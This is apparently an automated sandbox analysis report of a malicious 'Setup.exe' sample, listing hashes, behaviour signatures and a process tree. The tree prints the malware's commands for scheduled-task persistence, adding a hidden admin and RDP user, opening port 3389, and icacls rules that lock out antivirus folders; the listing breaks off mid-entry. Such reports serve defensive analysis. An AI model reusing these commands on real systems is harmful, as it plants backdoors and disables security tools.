Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    158s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    26/08/2024, 17:31 UTC

General

  • Target

    Setup-pass-2024/Setup.exe

  • Size

    4.2MB

  • MD5

    320e2e055e06df0aca09643116b3ef89

  • SHA1

    cfc8e9f6140a9b04f8a3b240bbace0ec845a3196

  • SHA256

    838f122a6e751fb3ffd45c48ea86374b0938ac70ffb6e05b1715f2de1f9bb04e

  • SHA512

    5b40dcee0f08dd52cf9339197af1e19cbd99e576c8ece9eabefe4caf2fbfb11d95541035c1940c0017d1a020bfe9b14d5889d39610ee205809ab4b3982af34ae

  • SSDEEP

    98304:t4mwM0MziYrBZUt8qxSiUIHrCPmYs3wP46U9Fu2DpECdko5M7gfYF:Wq0Wb0P6ILFW6uIEAE7g4

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 7 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • Remote Service Session Hijacking: RDP Hijacking 1 TTPs 3 IoCs

    Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

  • Blocks application from running via registry modification 28 IoCs

    Adds application to list of disallowed applications.

  • Drops file in Drivers directory 2 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 13 IoCs
  • Loads dropped DLL 1 IoCs
  • Modifies file permissions 1 TTPs 64 IoCs
  • Themida packer 64 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 7 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies WinLogon 2 TTPs 1 IoCs
  • AutoIT Executable 54 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 3 IoCs
  • Hide Artifacts: Hidden Users 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Drops file in Program Files directory 52 IoCs
  • Launches sc.exe 6 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Modifies registry class 3 IoCs
  • NTFS ADS 3 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 8 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 20 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup-pass-2024\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup-pass-2024\Setup.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of WriteProcessMemory
    PID:932
    • C:\ProgramData\Setup\install.exe
      C:\ProgramData\Setup\install.exe -palexpassword
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:792
      • C:\ProgramData\Setup\KMS.exe
        "C:\ProgramData\Setup\KMS.exe"
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        • Modifies Windows Defender notification settings
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Blocks application from running via registry modification
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Checks whether UAC is enabled
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetWindowsHookEx
        PID:4788
      • C:\ProgramData\Setup\update.exe
        "C:\ProgramData\Setup\update.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Drops file in Drivers directory
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Checks whether UAC is enabled
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4120
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\ControlService" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:4176
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\CashClean" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2404
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\SysFiles" /TR "C:\Windows\SysWOW64\unsecapp.exe" /SC MINUTE /MO 1 /RL HIGHEST
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2484
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\WinlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:1172
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\OnlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:1428
        • C:\ProgramData\Microsoft\win.exe
          C:\ProgramData\Microsoft\win.exe -ppidar
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:4760
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\CreedMobeN\RecoveryHosts" /TR "C:\ProgramData\Microsoft\DRM\8jMIti3ITk\CreedMobeN.bat" /SC ONLOGON /RL HIGHEST
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2320
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT_Data" /deny "%username%":(OI)(CI)(F)
          4⤵
            PID:2380
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1344
            • C:\Windows\system32\icacls.exe
              icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
              5⤵
              • Modifies file permissions
              PID:4452
          • C:\ProgramData\Setup\svchost.exe
            C:\ProgramData\Setup\svchost.exe -ppidar
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2440
            • C:\ProgramData\Setup\IP.exe
              "C:\ProgramData\Setup\IP.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Adds Run key to start application
              • Checks whether UAC is enabled
              • Drops file in System32 directory
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • NTFS ADS
              • Suspicious use of SetWindowsHookEx
              PID:2376
              • C:\Windows\SysWOW64\unsecapp.exe
                C:\Windows\SysWOW64\unsecapp.exe
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Checks whether UAC is enabled
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: GetForegroundWindowSpam
                PID:2772
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c C:\Programdata\Microsoft\temp\H.bat
                6⤵
                • Drops file in Drivers directory
                PID:1240
            • C:\ProgramData\Setup\smss.exe
              "C:\ProgramData\Setup\smss.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Drops file in Program Files directory
              • Checks processor information in registry
              • Modifies registry class
              • NTFS ADS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:788
              • C:\Windows\System32\schtasks.exe
                "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST
                6⤵
                • Scheduled Task/Job: Scheduled Task
                PID:4020
              • C:\Windows\System32\schtasks.exe
                "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST
                6⤵
                • Scheduled Task/Job: Scheduled Task
                PID:2080
              • C:\ProgramData\Windows Tasks Service\winserv.exe
                "C:\ProgramData\Windows Tasks Service\winserv.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                PID:1552
                • C:\ProgramData\Windows Tasks Service\winserv.exe
                  "C:\ProgramData\Windows Tasks Service\winserv.exe" -second
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  PID:2764
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c net user John 12345 /add
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:4092
                • C:\Windows\system32\net.exe
                  net user John 12345 /add
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1428
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 user John 12345 /add
                    8⤵
                      PID:4348
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4884
                  • C:\Windows\system32\net.exe
                    net localgroup "Администраторы" John /add
                    7⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3584
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 localgroup "Администраторы" John /add
                      8⤵
                        PID:4664
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3124
                    • C:\Windows\system32\net.exe
                      net localgroup "Пользователи удаленного рабочего стола" John /add
                      7⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3600
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
                        8⤵
                          PID:132
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1324
                      • C:\Windows\system32\net.exe
                        net localgroup "Пользователи удаленного управления" john /add" John /add
                        7⤵
                          PID:1372
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add
                            8⤵
                              PID:4448
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add
                          6⤵
                            PID:1868
                            • C:\Windows\system32\net.exe
                              net localgroup "Administrators" John /add
                              7⤵
                                PID:2628
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 localgroup "Administrators" John /add
                                  8⤵
                                    PID:1696
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add
                                6⤵
                                  PID:1500
                                  • C:\Windows\system32\net.exe
                                    net localgroup "Administradores" John /add
                                    7⤵
                                      PID:1248
                                      • C:\Windows\system32\net1.exe
                                        C:\Windows\system32\net1 localgroup "Administradores" John /add
                                        8⤵
                                          PID:1344
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add
                                      6⤵
                                      • Remote Service Session Hijacking: RDP Hijacking
                                      PID:4800
                                      • C:\Windows\system32\net.exe
                                        net localgroup "Remote Desktop Users" john /add
                                        7⤵
                                        • Remote Service Session Hijacking: RDP Hijacking
                                        PID:4368
                                        • C:\Windows\system32\net1.exe
                                          C:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add
                                          8⤵
                                          • Remote Service Session Hijacking: RDP Hijacking
                                          PID:2612
                                    • C:\ProgramData\RDPWinst.exe
                                      C:\ProgramData\RDPWinst.exe -i
                                      6⤵
                                      • Server Software Component: Terminal Services DLL
                                      • Executes dropped EXE
                                      • Modifies WinLogon
                                      • Drops file in System32 directory
                                      • Drops file in Program Files directory
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of SetWindowsHookEx
                                      PID:2024
                                      • C:\Windows\SYSTEM32\netsh.exe
                                        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                        7⤵
                                        • Modifies Windows Firewall
                                        • Event Triggered Execution: Netsh Helper DLL
                                        PID:1968
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
                                      6⤵
                                        PID:2528
                                        • C:\Windows\system32\timeout.exe
                                          timeout 5
                                          7⤵
                                          • Delays execution with timeout.exe
                                          PID:2768
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny "%username%":(OI)(CI)(F)
                                    4⤵
                                      PID:2980
                                      • C:\Windows\system32\icacls.exe
                                        icacls "C:\Program Files (x86)\Microsoft JDX" /deny "Admin":(OI)(CI)(F)
                                        5⤵
                                        • Modifies file permissions
                                        PID:4560
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
                                      4⤵
                                        PID:1664
                                        • C:\Windows\system32\icacls.exe
                                          icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
                                          5⤵
                                            PID:4904
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "%username%":(OI)(CI)(F)
                                          4⤵
                                            PID:132
                                            • C:\Windows\system32\icacls.exe
                                              icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "Admin":(OI)(CI)(F)
                                              5⤵
                                              • Modifies file permissions
                                              PID:2120
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
                                            4⤵
                                              PID:4576
                                              • C:\Windows\system32\icacls.exe
                                                icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
                                                5⤵
                                                • Modifies file permissions
                                                PID:4668
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "%username%":(OI)(CI)(F)
                                              4⤵
                                                PID:576
                                                • C:\Windows\System32\Conhost.exe
                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  5⤵
                                                    PID:3600
                                                  • C:\Windows\system32\icacls.exe
                                                    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "Admin":(OI)(CI)(F)
                                                    5⤵
                                                      PID:1324
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
                                                    4⤵
                                                      PID:2528
                                                      • C:\Windows\system32\icacls.exe
                                                        icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
                                                        5⤵
                                                          PID:4968
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny "%username%":(OI)(CI)(F)
                                                        4⤵
                                                          PID:4456
                                                          • C:\Windows\system32\icacls.exe
                                                            icacls "C:\Windows\Fonts\Mysql" /deny "Admin":(OI)(CI)(F)
                                                            5⤵
                                                              PID:500
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
                                                            4⤵
                                                              PID:3164
                                                              • C:\Windows\system32\icacls.exe
                                                                icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
                                                                5⤵
                                                                • Modifies file permissions
                                                                PID:4728
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny "%username%":(OI)(CI)(F)
                                                              4⤵
                                                                PID:1588
                                                                • C:\Windows\system32\icacls.exe
                                                                  icacls "c:\program files\Internet Explorer\bin" /deny "Admin":(OI)(CI)(F)
                                                                  5⤵
                                                                    PID:4412
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
                                                                  4⤵
                                                                    PID:2432
                                                                    • C:\Windows\System32\Conhost.exe
                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      5⤵
                                                                        PID:2932
                                                                      • C:\Windows\system32\icacls.exe
                                                                        icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
                                                                        5⤵
                                                                          PID:2180
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Windows\speechstracing" /deny "%username%":(OI)(CI)(F)
                                                                        4⤵
                                                                          PID:4144
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
                                                                          4⤵
                                                                            PID:4400
                                                                            • C:\Windows\system32\icacls.exe
                                                                              icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
                                                                              5⤵
                                                                              • Modifies file permissions
                                                                              PID:1916
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe " /c " & "icacls "c:\programdata\Malwarebytes" /deny "%username%":(F)
                                                                            4⤵
                                                                              PID:4312
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
                                                                              4⤵
                                                                                PID:1920
                                                                                • C:\Windows\system32\icacls.exe
                                                                                  icacls c:\programdata\Malwarebytes /deny System:(F)
                                                                                  5⤵
                                                                                  • Modifies file permissions
                                                                                  PID:2956
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\MB3Install" /deny "%username%":(F)
                                                                                4⤵
                                                                                  PID:3136
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
                                                                                  4⤵
                                                                                    PID:2992
                                                                                    • C:\Windows\system32\icacls.exe
                                                                                      icacls C:\Programdata\MB3Install /deny System:(F)
                                                                                      5⤵
                                                                                      • Modifies file permissions
                                                                                      PID:920
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\Indus" /deny "%username%":(OI)(CI)(F)
                                                                                    4⤵
                                                                                      PID:4608
                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        5⤵
                                                                                          PID:1372
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
                                                                                        4⤵
                                                                                          PID:4224
                                                                                          • C:\Windows\system32\icacls.exe
                                                                                            icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
                                                                                            5⤵
                                                                                              PID:5104
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe " /c " & "icacls "C:\AdwCleaner" /deny "%username%":(OI)(CI)(F)
                                                                                            4⤵
                                                                                              PID:1340
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny "%username%":(OI)(CI)(F)
                                                                                              4⤵
                                                                                                PID:1988
                                                                                                • C:\Windows\system32\icacls.exe
                                                                                                  icacls "C:\Program Files\ByteFence" /deny "Admin":(OI)(CI)(F)
                                                                                                  5⤵
                                                                                                  • Modifies file permissions
                                                                                                  PID:1248
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT2020_Data" /deny "%username%":(OI)(CI)(F)
                                                                                                4⤵
                                                                                                  PID:2424
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)
                                                                                                  4⤵
                                                                                                    PID:3944
                                                                                                    • C:\Windows\system32\icacls.exe
                                                                                                      icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)
                                                                                                      5⤵
                                                                                                        PID:1588
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe " /c " & "icacls "C:\FRST" /deny "%username%":(OI)(CI)(F)
                                                                                                      4⤵
                                                                                                        PID:2932
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c icacls C:\FRST /deny system:(OI)(CI)(F)
                                                                                                        4⤵
                                                                                                          PID:4956
                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                            icacls C:\FRST /deny system:(OI)(CI)(F)
                                                                                                            5⤵
                                                                                                            • Modifies file permissions
                                                                                                            PID:1800
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny "%username%":(OI)(CI)(F)
                                                                                                          4⤵
                                                                                                            PID:1916
                                                                                                            • C:\Windows\system32\icacls.exe
                                                                                                              icacls "C:\Program Files (x86)\360" /deny "Admin":(OI)(CI)(F)
                                                                                                              5⤵
                                                                                                              • Modifies file permissions
                                                                                                              PID:4200
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny "%username%":(OI)(CI)(F)
                                                                                                            4⤵
                                                                                                              PID:244
                                                                                                              • C:\Windows\system32\icacls.exe
                                                                                                                icacls "C:\ProgramData\360safe" /deny "Admin":(OI)(CI)(F)
                                                                                                                5⤵
                                                                                                                • Modifies file permissions
                                                                                                                PID:900
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny "%username%":(OI)(CI)(F)
                                                                                                              4⤵
                                                                                                                PID:4348
                                                                                                                • C:\Windows\system32\icacls.exe
                                                                                                                  icacls "C:\Program Files (x86)\SpyHunter" /deny "Admin":(OI)(CI)(F)
                                                                                                                  5⤵
                                                                                                                    PID:920
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny "%username%":(OI)(CI)(F)
                                                                                                                  4⤵
                                                                                                                    PID:4668
                                                                                                                    • C:\Windows\system32\icacls.exe
                                                                                                                      icacls "C:\Program Files\Malwarebytes" /deny "Admin":(OI)(CI)(F)
                                                                                                                      5⤵
                                                                                                                      • Modifies file permissions
                                                                                                                      PID:2120
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny "%username%":(OI)(CI)(F)
                                                                                                                    4⤵
                                                                                                                      PID:2136
                                                                                                                      • C:\Windows\system32\icacls.exe
                                                                                                                        icacls "C:\Program Files\COMODO" /deny "Admin":(OI)(CI)(F)
                                                                                                                        5⤵
                                                                                                                          PID:576
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny "%username%":(OI)(CI)(F)
                                                                                                                        4⤵
                                                                                                                          PID:1172
                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                            icacls "C:\Program Files\Enigma Software Group" /deny "Admin":(OI)(CI)(F)
                                                                                                                            5⤵
                                                                                                                              PID:4968
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny "%username%":(OI)(CI)(F)
                                                                                                                            4⤵
                                                                                                                              PID:1432
                                                                                                                              • C:\Windows\system32\icacls.exe
                                                                                                                                icacls "C:\Program Files\SpyHunter" /deny "Admin":(OI)(CI)(F)
                                                                                                                                5⤵
                                                                                                                                  PID:4112
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny "%username%":(OI)(CI)(F)
                                                                                                                                4⤵
                                                                                                                                  PID:3332
                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    5⤵
                                                                                                                                      PID:4368
                                                                                                                                    • C:\Windows\system32\icacls.exe
                                                                                                                                      icacls "C:\Program Files\AVAST Software" /deny "Admin":(OI)(CI)(F)
                                                                                                                                      5⤵
                                                                                                                                      • Modifies file permissions
                                                                                                                                      PID:3360
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny "%username%":(OI)(CI)(F)
                                                                                                                                    4⤵
                                                                                                                                      PID:3592
                                                                                                                                      • C:\Windows\system32\icacls.exe
                                                                                                                                        icacls "C:\Program Files (x86)\AVAST Software" /deny "Admin":(OI)(CI)(F)
                                                                                                                                        5⤵
                                                                                                                                          PID:764
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny "%username%":(OI)(CI)(F)
                                                                                                                                        4⤵
                                                                                                                                          PID:3220
                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                            icacls "C:\Programdata\AVAST Software" /deny "Admin":(OI)(CI)(F)
                                                                                                                                            5⤵
                                                                                                                                              PID:4552
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny "%username%":(OI)(CI)(F)
                                                                                                                                            4⤵
                                                                                                                                              PID:4400
                                                                                                                                              • C:\Windows\system32\icacls.exe
                                                                                                                                                icacls "C:\Program Files\AVG" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                5⤵
                                                                                                                                                • Modifies file permissions
                                                                                                                                                PID:1592
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny "%username%":(OI)(CI)(F)
                                                                                                                                              4⤵
                                                                                                                                                PID:3160
                                                                                                                                                • C:\Windows\system32\icacls.exe
                                                                                                                                                  icacls "C:\Program Files (x86)\AVG" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                  5⤵
                                                                                                                                                  • Modifies file permissions
                                                                                                                                                  PID:3384
                                                                                                                                              • C:\Windows\system32\cmd.exe
